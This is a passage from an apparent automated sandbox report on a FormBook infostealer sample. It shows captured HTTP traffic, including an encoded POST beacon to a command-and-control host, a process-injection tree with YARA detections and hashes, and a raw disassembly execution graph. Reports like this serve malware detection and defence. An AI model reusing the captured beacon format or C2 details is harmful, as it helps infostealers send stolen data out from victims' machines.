                                                Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                Dec 13, 2024 11:41:21.662889004 CET1236INData Raw: 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 0a 09 09 09 3c 68 32 3e 52 65 67 69 73 74 65 72 20 64 6f 6d 61 69 6e 73 20 61 74 20 4c 6f 6f 70 69 61 3c 2f 68 32 3e 0a 09 09 09 3c 70 3e 50 72 6f 74 65 63 74 20 79 6f 75 72 20
                                                Data Ascii: ss="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainnames/?utm_medium=sitelink
                                                Dec 13, 2024 11:41:21.662925005 CET1236INData Raw: 64 20 6d 6f 72 65 20 61 74 20 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 6f 70 69 61 64 6e 73 20 c2 bb 3c 2f 61 3e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e
                                                Data Ascii: d more at loopia.com/loopiadns </a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need to get started with you
                                                Dec 13, 2024 11:41:21.662961006 CET430INData Raw: 77 77 2e 6c 6f 6f 70 69 61 2e 73 65 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67
                                                Data Ascii: ww.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb"><img src="https://static.loopia.se/shared/logo/logo-loopia-white.svg" alt="Loopia AB" id="logo" /></a><br /><p><a href="https://www.loopia.com/support?


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.1049980199.59.243.227802592C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 13, 2024 11:41:27.393131971 CET663OUTPOST /emhd/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: max-age=0
                                                Content-Length: 194
                                                Connection: close
                                                Host: www.vavada-official.buzz
                                                Origin: http://www.vavada-official.buzz
                                                Referer: http://www.vavada-official.buzz/emhd/
                                                User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                Data Raw: 36 68 7a 6c 70 3d 56 31 59 4e 66 2f 73 62 43 37 53 47 74 63 61 76 31 48 5a 46 35 57 6f 2b 71 62 59 4e 58 7a 49 2b 6a 72 77 76 72 67 4d 2b 4c 4a 6b 53 2b 6a 61 56 71 78 68 63 6c 53 34 6e 7a 7a 75 45 61 75 49 45 41 62 50 4c 5a 46 6d 54 61 48 5a 33 6c 78 52 71 71 52 71 47 50 38 61 33 44 39 38 6e 57 54 53 39 6f 56 67 4d 48 70 42 72 32 2b 70 37 46 63 2b 74 59 6b 38 55 78 55 55 7a 51 6e 42 32 66 41 4b 63 63 68 43 37 75 77 61 73 32 6c 67 4c 54 31 78 2b 68 6a 62 77 51 57 4d 6c 39 38 47 32 4d 47 44 38 41 35 4f 4d 53 34 4b 79 6e 75 52 74 44 51 58 55 2f 31 75 69 34 4d 67 58 5a 79 70 48
                                                Data Ascii: 6hzlp=V1YNf/sbC7SGtcav1HZF5Wo+qbYNXzI+jrwvrgM+LJkS+jaVqxhclS4nzzuEauIEAbPLZFmTaHZ3lxRqqRqGP8a3D98nWTS9oVgMHpBr2+p7Fc+tYk8UxUUzQnB2fAKcchC7uwas2lgLT1x+hjbwQWMl98G2MGD8A5OMS4KynuRtDQXU/1ui4MgXZypH
                                                Dec 13, 2024 11:41:28.479172945 CET1236INHTTP/1.1 200 OK
                                                date: Fri, 13 Dec 2024 10:41:27 GMT
                                                content-type: text/html; charset=utf-8
                                                content-length: 1146
                                                x-request-id: 78db6671-640f-4d34-8acc-0e39b20cb5af
                                                cache-control: no-store, max-age=0
                                                accept-ch: sec-ch-prefers-color-scheme
                                                critical-ch: sec-ch-prefers-color-scheme
                                                vary: sec-ch-prefers-color-scheme
                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==
                                                set-cookie: parking_session=78db6671-640f-4d34-8acc-0e39b20cb5af; expires=Fri, 13 Dec 2024 10:56:28 GMT; path=/
                                                connection: close
                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 6c 47 55 39 6c 72 4c 66 54 43 43 4c 41 47 6f 42 61 75 45 6a 6a 79 76 4f 70 50 75 76 5a 51 4a 33 57 58 57 67 48 6b 37 31 72 4b 38 77 59 52 50 4c 7a 35 77 76 4f 54 61 56 54 2b 57 2b 46 59 62 4b 36 49 37 70 64 58 67 35 45 7a 6d 52 36 63 69 69 39 73 66 49 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                Dec 13, 2024 11:41:28.479288101 CET599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzhkYjY2NzEtNjQwZi00ZDM0LThhY2MtMGUzOWIyMGNiNWFmIiwicGFnZV90aW1lIjoxNzM0MDg2ND


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:5
                                                Start time:05:39:21
                                                Start date:13/12/2024
                                                Path:C:\Users\user\Desktop\new.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\new.exe"
                                                Imagebase:0xbc0000
                                                File size:1'208'832 bytes
                                                MD5 hash:8B86502F8B81E3335C1F4906C8ACB9F7
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:7
                                                Start time:05:39:24
                                                Start date:13/12/2024
                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\new.exe"
                                                Imagebase:0xbe0000
                                                File size:46'504 bytes
                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1897811815.0000000007850000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1893344480.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1894505430.0000000004BE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:9
                                                Start time:05:40:13
                                                Start date:13/12/2024
                                                Path:C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe"
                                                Imagebase:0x750000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2533155385.0000000004350000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:10
                                                Start time:05:40:18
                                                Start date:13/12/2024
                                                Path:C:\Windows\SysWOW64\cttune.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\cttune.exe"
                                                Imagebase:0x640000
                                                File size:72'192 bytes
                                                MD5 hash:E515AF722F75E1A5708B532FAA483333
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2533835730.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2533575753.0000000003290000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2530076362.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:false

                                                General

                                                Target ID:13
                                                Start time:05:40:30
                                                Start date:13/12/2024
                                                Path:C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe"
                                                Imagebase:0x750000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2535533484.0000000005400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:15
                                                Start time:05:40:42
                                                Start date:13/12/2024
                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                Imagebase:0x7ff613480000
                                                File size:676'768 bytes
                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:3.7%
                                                  Dynamic/Decrypted Code Coverage:1.5%
                                                  Signature Coverage:6.8%
                                                  Total number of Nodes:2000
                                                  Total number of Limit Nodes:65
                                                  execution_graph 104134 bc107d 104139 bc708b 104134->104139 104136 bc108c 104170 be2d40 104136->104170 104140 bc709b __ftell_nolock 104139->104140 104173 bc7667 104140->104173 104144 bc715a 104185 be050b 104144->104185 104151 bc7667 59 API calls 104152 bc718b 104151->104152 104204 bc7d8c 104152->104204 104154 bc7194 RegOpenKeyExW 104155 bfe8b1 RegQueryValueExW 104154->104155 104160 bc71b6 Mailbox 104154->104160 104156 bfe8ce 104155->104156 104157 bfe943 RegCloseKey 104155->104157 104208 be0db6 104156->104208 104157->104160 104169 bfe955 _wcscat Mailbox __wsetenvp 104157->104169 104159 bfe8e7 104218 bc522e 104159->104218 104160->104136 104163 bc79f2 59 API calls 104163->104169 104164 bfe90f 104221 bc7bcc 104164->104221 104166 bfe929 104166->104157 104168 bc3f74 59 API calls 104168->104169 104169->104160 104169->104163 104169->104168 104230 bc7de1 104169->104230 104295 be2c44 104170->104295 104172 bc1096 104174 be0db6 Mailbox 59 API calls 104173->104174 104175 bc7688 104174->104175 104176 be0db6 Mailbox 59 API calls 104175->104176 104177 bc7151 104176->104177 104178 bc4706 104177->104178 104234 bf1940 104178->104234 104181 bc7de1 59 API calls 104182 bc4739 104181->104182 104236 bc4750 104182->104236 104184 bc4743 Mailbox 104184->104144 104186 bf1940 __ftell_nolock 104185->104186 104187 be0518 GetFullPathNameW 104186->104187 104188 be053a 104187->104188 104189 bc7bcc 59 API calls 104188->104189 104190 bc7165 104189->104190 104191 bc7cab 104190->104191 104192 bc7cbf 104191->104192 104193 bfed4a 104191->104193 104258 bc7c50 104192->104258 104263 bc8029 104193->104263 104196 bfed55 __wsetenvp _memmove 104197 bc7173 104198 bc3f74 104197->104198 104199 bc3f82 104198->104199 104203 bc3fa4 _memmove 104198->104203 104201 be0db6 Mailbox 59 API calls 104199->104201 104200 be0db6 Mailbox 59 API calls 104202 bc3fb8 104200->104202 104201->104203 104202->104151 104203->104200 104205 bc7da6 104204->104205 104207 bc7d99 104204->104207 104206 be0db6 Mailbox 59 API calls 104205->104206 104206->104207 104207->104154 104212 be0dbe 104208->104212 104210 be0dd8 104210->104159 104212->104210 104213 be0ddc std::exception::exception 104212->104213 104266 be571c 104212->104266 104283 be33a1 DecodePointer 104212->104283 104284 be859b RaiseException 104213->104284 104215 be0e06 104285 be84d1 58 API calls _free 104215->104285 104217 be0e18 104217->104159 104219 be0db6 Mailbox 59 API calls 104218->104219 104220 bc5240 RegQueryValueExW 104219->104220 104220->104164 104220->104166 104222 bc7bd8 __wsetenvp 104221->104222 104223 bc7c45 104221->104223 104225 bc7bee 104222->104225 104226 bc7c13 104222->104226 104224 bc7d2c 59 API calls 104223->104224 104229 bc7bf6 _memmove 104224->104229 104294 bc7f27 59 API calls Mailbox 104225->104294 104227 bc8029 59 API calls 104226->104227 104227->104229 104229->104166 104231 bc7df0 __wsetenvp _memmove 104230->104231 104232 be0db6 Mailbox 59 API calls 104231->104232 104233 bc7e2e 104232->104233 104233->104169 104235 bc4713 GetModuleFileNameW 104234->104235 104235->104181 104237 bf1940 __ftell_nolock 104236->104237 104238 bc475d GetFullPathNameW 104237->104238 104239 bc477c 104238->104239 104240 bc4799 104238->104240 104241 bc7bcc 59 API calls 104239->104241 104242 bc7d8c 59 API calls 104240->104242 104243 bc4788 104241->104243 104242->104243 104246 bc7726 104243->104246 104247 bc7734 104246->104247 104250 bc7d2c 104247->104250 104249 bc4794 104249->104184 104251 bc7d3a 104250->104251 104253 bc7d43 _memmove 104250->104253 104251->104253 104254 bc7e4f 104251->104254 104253->104249 104255 bc7e62 104254->104255 104257 bc7e5f _memmove 104254->104257 104256 be0db6 Mailbox 59 API calls 104255->104256 104256->104257 104257->104253 104259 bc7c5f __wsetenvp 104258->104259 104260 bc8029 59 API calls 104259->104260 104261 bc7c70 _memmove 104259->104261 104262 bfed07 _memmove 104260->104262 104261->104197 104264 be0db6 Mailbox 59 API calls 104263->104264 104265 bc8033 104264->104265 104265->104196 104267 be5797 104266->104267 104274 be5728 104266->104274 104292 be33a1 DecodePointer 104267->104292 104269 be579d 104293 be8b28 58 API calls __getptd_noexit 104269->104293 104272 be575b RtlAllocateHeap 104272->104274 104282 be578f 104272->104282 104274->104272 104275 be5733 104274->104275 104276 be5783 104274->104276 104280 be5781 104274->104280 104289 be33a1 DecodePointer 104274->104289 104275->104274 104286 bea16b 58 API calls __NMSG_WRITE 104275->104286 104287 bea1c8 58 API calls 7 library calls 104275->104287 104288 be309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104275->104288 104290 be8b28 58 API calls __getptd_noexit 104276->104290 104291 be8b28 58 API calls __getptd_noexit 104280->104291 104282->104212 104283->104212 104284->104215 104285->104217 104286->104275 104287->104275 104289->104274 104290->104280 104291->104282 104292->104269 104293->104282 104294->104229 104296 be2c50 __lseeki64 104295->104296 104303 be3217 104296->104303 104302 be2c77 __lseeki64 104302->104172 104320 be9c0b 104303->104320 104305 be2c59 104306 be2c88 DecodePointer DecodePointer 104305->104306 104307 be2c65 104306->104307 104308 be2cb5 104306->104308 104317 be2c82 104307->104317 104308->104307 104366 be87a4 59 API calls __wcsnicmp_l 104308->104366 104310 be2d18 EncodePointer EncodePointer 104310->104307 104311 be2cc7 104311->104310 104312 be2cec 104311->104312 104367 be8864 61 API calls __realloc_crt 104311->104367 104312->104307 104315 be2d06 EncodePointer 104312->104315 104368 be8864 61 API calls __realloc_crt 104312->104368 104315->104310 104316 be2d00 104316->104307 104316->104315 104369 be3220 104317->104369 104321 be9c2f EnterCriticalSection 104320->104321 104322 be9c1c 104320->104322 104321->104305 104327 be9c93 104322->104327 104324 be9c22 104324->104321 104351 be30b5 58 API calls 3 library calls 104324->104351 104328 be9c9f __lseeki64 104327->104328 104329 be9ca8 104328->104329 104330 be9cc0 104328->104330 104352 bea16b 58 API calls __NMSG_WRITE 104329->104352 104338 be9ce1 __lseeki64 104330->104338 104355 be881d 58 API calls 2 library calls 104330->104355 104333 be9cad 104353 bea1c8 58 API calls 7 library calls 104333->104353 104334 be9cd5 104336 be9cdc 104334->104336 104337 be9ceb 104334->104337 104356 be8b28 58 API calls __getptd_noexit 104336->104356 104341 be9c0b __lock 58 API calls 104337->104341 104338->104324 104339 be9cb4 104354 be309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104339->104354 104343 be9cf2 104341->104343 104345 be9cff 104343->104345 104346 be9d17 104343->104346 104357 be9e2b InitializeCriticalSectionAndSpinCount 104345->104357 104358 be2d55 104346->104358 104349 be9d0b 104364 be9d33 LeaveCriticalSection _doexit 104349->104364 104352->104333 104353->104339 104355->104334 104356->104338 104357->104349 104359 be2d5e RtlFreeHeap 104358->104359 104360 be2d87 _free 104358->104360 104359->104360 104361 be2d73 104359->104361 104360->104349 104365 be8b28 58 API calls __getptd_noexit 104361->104365 104363 be2d79 GetLastError 104363->104360 104364->104338 104365->104363 104366->104311 104367->104312 104368->104316 104372 be9d75 LeaveCriticalSection 104369->104372 104371 be2c87 104371->104302 104372->104371 104373 bffdfc 104413 bcab30 Mailbox _memmove 104373->104413 104375 c1617e Mailbox 59 API calls 104395 bca057 104375->104395 104377 be0db6 59 API calls Mailbox 104377->104413 104379 bcb525 104571 c29e4a 90 API calls 4 library calls 104379->104571 104381 c00055 104566 c29e4a 90 API calls 4 library calls 104381->104566 104382 be0db6 59 API calls Mailbox 104399 bc9f37 Mailbox 104382->104399 104385 bcb475 104567 bc8047 104385->104567 104387 c00064 104390 bcb47a 104390->104381 104402 c009e5 104390->104402 104392 bc8047 59 API calls 104392->104399 104394 bc7667 59 API calls 104394->104399 104396 c16e8f 59 API calls 104396->104399 104397 be2d40 67 API calls __cinit 104397->104399 104398 bc7de1 59 API calls 104398->104413 104399->104381 104399->104382 104399->104385 104399->104390 104399->104392 104399->104394 104399->104395 104399->104396 104399->104397 104400 c009d6 104399->104400 104403 bca55a 104399->104403 104421 bcb900 104399->104421 104545 bcc8c0 342 API calls 2 library calls 104399->104545 104574 c29e4a 90 API calls 4 library calls 104400->104574 104575 c29e4a 90 API calls 4 library calls 104402->104575 104573 c29e4a 90 API calls 4 library calls 104403->104573 104406 bcb2b6 104564 bcf6a3 342 API calls 104406->104564 104409 c0086a 104410 bc9c90 Mailbox 59 API calls 104409->104410 104414 c0085c 104410->104414 104411 c00878 104572 c29e4a 90 API calls 4 library calls 104411->104572 104413->104377 104413->104379 104413->104395 104413->104398 104413->104399 104413->104406 104413->104409 104413->104411 104413->104414 104415 bcb21c 104413->104415 104418 c16e8f 59 API calls 104413->104418 104437 bc9ea0 104413->104437 104461 c3df23 104413->104461 104464 c3c2e0 104413->104464 104496 c27956 104413->104496 104502 c3bc6b 104413->104502 104542 c1617e 104413->104542 104546 bc9c90 104413->104546 104565 c3c193 86 API calls 2 library calls 104413->104565 104414->104375 104414->104395 104551 bc9d3c 104415->104551 104417 bcb22d 104419 bc9d3c 60 API calls 104417->104419 104418->104413 104419->104406 104422 bcb91a 104421->104422 104424 bcbac7 104421->104424 104423 bcbf81 104422->104423 104422->104424 104426 bcb9fc 104422->104426 104427 bcbaab 104422->104427 104423->104427 104580 bc94dc 59 API calls __gmtime64_s 104423->104580 104424->104423 104424->104427 104432 bcbb46 104424->104432 104434 bcba8b Mailbox 104424->104434 104426->104427 104430 bcba38 104426->104430 104426->104432 104427->104399 104427->104427 104428 c01361 104428->104427 104578 be3d46 59 API calls __wtof_l 104428->104578 104430->104427 104430->104434 104436 c011b4 104430->104436 104432->104427 104432->104428 104432->104434 104577 c16e8f 59 API calls 104432->104577 104434->104399 104434->104427 104434->104428 104579 bc8cd4 59 API calls Mailbox 104434->104579 104436->104427 104576 be3d46 59 API calls __wtof_l 104436->104576 104438 bc9ebf 104437->104438 104454 bc9eed Mailbox 104437->104454 104439 be0db6 Mailbox 59 API calls 104438->104439 104439->104454 104440 bcb475 104441 bc8047 59 API calls 104440->104441 104456 bca057 104441->104456 104442 be0db6 59 API calls Mailbox 104442->104454 104443 bcb47a 104444 c00055 104443->104444 104459 c009e5 104443->104459 104582 c29e4a 90 API calls 4 library calls 104444->104582 104446 bcb900 60 API calls 104446->104454 104448 c00064 104448->104413 104451 bc8047 59 API calls 104451->104454 104452 bc7667 59 API calls 104452->104454 104453 c16e8f 59 API calls 104453->104454 104454->104440 104454->104442 104454->104443 104454->104444 104454->104446 104454->104451 104454->104452 104454->104453 104455 be2d40 67 API calls __cinit 104454->104455 104454->104456 104457 c009d6 104454->104457 104460 bca55a 104454->104460 104581 bcc8c0 342 API calls 2 library calls 104454->104581 104455->104454 104456->104413 104584 c29e4a 90 API calls 4 library calls 104457->104584 104585 c29e4a 90 API calls 4 library calls 104459->104585 104583 c29e4a 90 API calls 4 library calls 104460->104583 104586 c3cadd 104461->104586 104463 c3df33 104463->104413 104465 bc7667 59 API calls 104464->104465 104466 c3c2f4 104465->104466 104467 bc7667 59 API calls 104466->104467 104468 c3c2fc 104467->104468 104469 bc7667 59 API calls 104468->104469 104470 c3c304 104469->104470 104471 bc9837 85 API calls 104470->104471 104495 c3c312 104471->104495 104472 bc7bcc 59 API calls 104472->104495 104473 c3c4fb 104474 c3c528 Mailbox 104473->104474 104740 bc9a3c 59 API calls Mailbox 104473->104740 104474->104413 104475 c3c4e2 104477 bc7cab 59 API calls 104475->104477 104481 c3c4ef 104477->104481 104478 bc7924 59 API calls 104478->104495 104479 c3c4fd 104482 bc7cab 59 API calls 104479->104482 104480 bc8047 59 API calls 104480->104495 104731 bc7b2e 104481->104731 104484 c3c50c 104482->104484 104486 bc7b2e 59 API calls 104484->104486 104485 bc7e4f 59 API calls 104488 c3c3a9 CharUpperBuffW 104485->104488 104486->104473 104487 bc7e4f 59 API calls 104489 c3c469 CharUpperBuffW 104487->104489 104729 bc843a 68 API calls 104488->104729 104730 bcc5a7 69 API calls 2 library calls 104489->104730 104492 bc9837 85 API calls 104492->104495 104493 bc7cab 59 API calls 104493->104495 104494 bc7b2e 59 API calls 104494->104495 104495->104472 104495->104473 104495->104474 104495->104475 104495->104478 104495->104479 104495->104480 104495->104485 104495->104487 104495->104492 104495->104493 104495->104494 104497 c27962 104496->104497 104498 be0db6 Mailbox 59 API calls 104497->104498 104499 c27970 104498->104499 104500 c2797e 104499->104500 104501 bc7667 59 API calls 104499->104501 104500->104413 104501->104500 104503 c3bcb0 104502->104503 104504 c3bc96 104502->104504 104749 c3a213 59 API calls Mailbox 104503->104749 104748 c29e4a 90 API calls 4 library calls 104504->104748 104507 c3bcbb 104508 bc9ea0 341 API calls 104507->104508 104509 c3bd1c 104508->104509 104510 c3bdae 104509->104510 104511 c3bd5d 104509->104511 104535 c3bca8 Mailbox 104509->104535 104512 c3be04 104510->104512 104514 c3bdb4 104510->104514 104750 c272df 59 API calls Mailbox 104511->104750 104513 bc9837 85 API calls 104512->104513 104512->104535 104515 c3be16 104513->104515 104771 c2791a 59 API calls 104514->104771 104517 bc7e4f 59 API calls 104515->104517 104521 c3be3a CharUpperBuffW 104517->104521 104518 c3bdd7 104772 bc5d41 59 API calls Mailbox 104518->104772 104520 c3bd8d 104751 bcf460 104520->104751 104525 c3be54 104521->104525 104524 c3bddf Mailbox 104773 bcfce0 104524->104773 104526 c3bea7 104525->104526 104527 c3be5b 104525->104527 104528 bc9837 85 API calls 104526->104528 104853 c272df 59 API calls Mailbox 104527->104853 104530 c3beaf 104528->104530 104854 bc9e5d 60 API calls 104530->104854 104533 c3be89 104534 bcf460 341 API calls 104533->104534 104534->104535 104535->104413 104536 c3beb9 104536->104535 104537 bc9837 85 API calls 104536->104537 104538 c3bed4 104537->104538 104855 bc5d41 59 API calls Mailbox 104538->104855 104540 c3bee4 104541 bcfce0 341 API calls 104540->104541 104541->104535 106008 c160c0 104542->106008 104544 c1618c 104544->104413 104545->104399 104548 bc9c9b 104546->104548 104547 bc9cd2 104547->104413 104548->104547 106013 bc8cd4 59 API calls Mailbox 104548->106013 104550 bc9cfd 104550->104413 104552 bc9d78 Mailbox 104551->104552 104553 bc9d4a 104551->104553 104552->104417 104554 bc9d9d 104553->104554 104557 bc9d50 Mailbox 104553->104557 104556 bc8047 59 API calls 104554->104556 104555 bc9d64 104555->104552 104558 bc9dcc 104555->104558 104559 bc9d6f 104555->104559 104556->104552 104557->104555 104562 bffa0f 104557->104562 104558->104552 106014 bc8cd4 59 API calls Mailbox 104558->106014 104559->104552 104561 bff9e6 VariantClear 104559->104561 104561->104552 104562->104552 106015 c16e8f 59 API calls 104562->106015 104564->104379 104565->104413 104566->104387 104568 bc805a 104567->104568 104569 bc8052 104567->104569 104568->104395 106016 bc7f77 59 API calls 2 library calls 104569->106016 104571->104414 104572->104414 104573->104395 104574->104402 104575->104395 104576->104436 104577->104434 104578->104427 104579->104434 104580->104427 104581->104454 104582->104448 104583->104456 104584->104459 104585->104456 104624 bc9837 104586->104624 104590 c3cdb9 104591 c3cf2e 104590->104591 104596 c3cdc7 104590->104596 104691 c3d8c8 93 API calls Mailbox 104591->104691 104594 c3cf3d 104594->104596 104597 c3cf49 104594->104597 104595 bc9837 85 API calls 104614 c3cbb2 Mailbox 104595->104614 104655 c3c96e 104596->104655 104611 c3cb61 Mailbox 104597->104611 104602 c3ce00 104670 be0c08 104602->104670 104605 c3ce33 104677 bc92ce 104605->104677 104606 c3ce1a 104676 c29e4a 90 API calls 4 library calls 104606->104676 104609 c3ce25 GetCurrentProcess TerminateProcess 104609->104605 104611->104463 104614->104590 104614->104595 104614->104611 104674 c3fbce 59 API calls 2 library calls 104614->104674 104675 c3cfdf 61 API calls 2 library calls 104614->104675 104615 c3cfa4 104615->104611 104620 c3cfb8 FreeLibrary 104615->104620 104617 c3ce6b 104689 c3d649 108 API calls _free 104617->104689 104620->104611 104621 c3ce7c 104621->104615 104623 